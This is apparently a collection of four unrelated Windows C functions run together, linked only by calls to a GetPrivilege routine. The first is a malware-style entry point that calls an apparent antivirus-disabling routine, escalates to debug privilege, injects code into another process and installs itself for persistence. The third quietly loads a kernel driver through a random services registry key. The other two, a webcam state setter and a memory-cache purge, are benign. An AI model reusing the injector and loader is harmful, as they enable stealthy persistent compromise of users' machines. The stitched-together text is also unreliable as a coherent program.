//----------------------------------------------------------------- BOOL __stdcall WinMain(HINSTANCE, HINSTANCE, PTSTR, int){ char buf[128]; AVPsex(); GetSystemDirectory(buf, 128); strcat(buf, "\\"); strcat(buf, MY_MACRO_RECORD_NAME); strcat(buf, ".exe\0"); GetMaxPriv(); // InstallAndRegisterDrivers(); if(GetPrivilege("SeDebugPrivilege")){ if(FileExist(buf)){ InjectCode(ProcIdByPriv(0), &EnterPoint, NULL); }else{ InjectCode(ProcIdByPriv(0), &EnterPoint, NULL); AddIntoSystem(MY_MACRO_RECORD_NAME, 1); AddIntoSystem(MY_MACRO_RECORD_NAME, 0); return FALSE; } }else{ if(FileExist(buf)){ InjectCode(ProcIdByPriv(0), &EnterPoint, NULL); }else{ InjectCode(ProcIdByPriv(0), &EnterPoint, NULL); AddIntoSystem(MY_MACRO_RECORD_NAME, 1); AddIntoSystem(MY_MACRO_RECORD_NAME, 0); return FALSE; } } return FALSE; }
void SetRunTimeState(HTTPCONNECTION hConnection) { g_WebCamState.ucUserCheck = (unsigned char)g_ConfigParam.bUserCheck; if (g_WebCamState.ucUserCheck) g_WebCamState.ucPrivilege = (unsigned char)GetPrivilege(hConnection); else g_WebCamState.ucPrivilege = 0; g_WebCamState.ucMotionDetectWay = g_ConfigParam.ucMotionDetectWay; }
VOID StartSys(LPCSTR chSysPath) { NTSTATUS St; BOOL bRet = FALSE; HKEY hKey; CHAR chRegPath[MAX_PATH]; WCHAR wcLoadDrv[MAX_PATH]; CHAR chImagePath[MAX_PATH] = "\\??\\"; UNICODE_STRING usStr; DWORD dwType; GetPrivilege(SE_LOAD_DRIVER_PRIVILEGE); DbgPrint(__FUNCTION__"(): driver path '%s'\n",chSysPath); DWORD dwId = GetTickCount(); _snprintf(chRegPath,RTL_NUMBER_OF(chRegPath)-1,"system\\currentcontrolset\\services\\%x", dwId); _snwprintf(wcLoadDrv,RTL_NUMBER_OF(wcLoadDrv)-1,L"\\registry\\machine\\system\\currentcontrolset\\services\\%x", dwId); strncat(chImagePath,chSysPath,sizeof(chImagePath)); if (RegCreateKey(HKEY_LOCAL_MACHINE,chRegPath,&hKey) == ERROR_SUCCESS) { RegSetValueEx(hKey,"ImagePath",0,REG_SZ,(LPBYTE)&chImagePath,strlen(chImagePath)+1); dwType = SERVICE_KERNEL_DRIVER; RegSetValueEx(hKey,"Type",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD)); dwType = SERVICE_DEMAND_START; RegSetValueEx(hKey,"Start",0,REG_DWORD,(LPBYTE)&dwType,sizeof(DWORD)); RegCloseKey(hKey); RtlInitUnicodeString(&usStr,wcLoadDrv); St = NtLoadDriver(&usStr); DbgPrint(__FUNCTION__"(): NtLoadDriver status %x\n",St); } else { DbgPrint(__FUNCTION__"(): RegCreateKey last error %x\n",GetLastError()); } }
static int cmd_dropcaches(void) { HANDLE hProcess = GetCurrentProcess(); HANDLE hToken; HMODULE ntdll; DWORD(WINAPI *NtSetSystemInformation)(INT, PVOID, ULONG); SYSTEM_MEMORY_LIST_COMMAND command; int status; if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) return error("Can't open current process token"); if (!GetPrivilege(hToken, "SeProfileSingleProcessPrivilege", 1)) return error("Can't get SeProfileSingleProcessPrivilege"); CloseHandle(hToken); ntdll = LoadLibrary("ntdll.dll"); if (!ntdll) return error("Can't load ntdll.dll, wrong Windows version?"); NtSetSystemInformation = (DWORD(WINAPI *)(INT, PVOID, ULONG))GetProcAddress(ntdll, "NtSetSystemInformation"); if (!NtSetSystemInformation) return error("Can't get function addresses, wrong Windows version?"); command = MemoryPurgeStandbyList; status = NtSetSystemInformation( SystemMemoryListInformation, &command, sizeof(SYSTEM_MEMORY_LIST_COMMAND) ); if (status == STATUS_PRIVILEGE_NOT_HELD) error("Insufficient privileges to purge the standby list, need admin access"); else if (status != STATUS_SUCCESS) error("Unable to execute the memory list command %d", status); FreeLibrary(ntdll); return status; }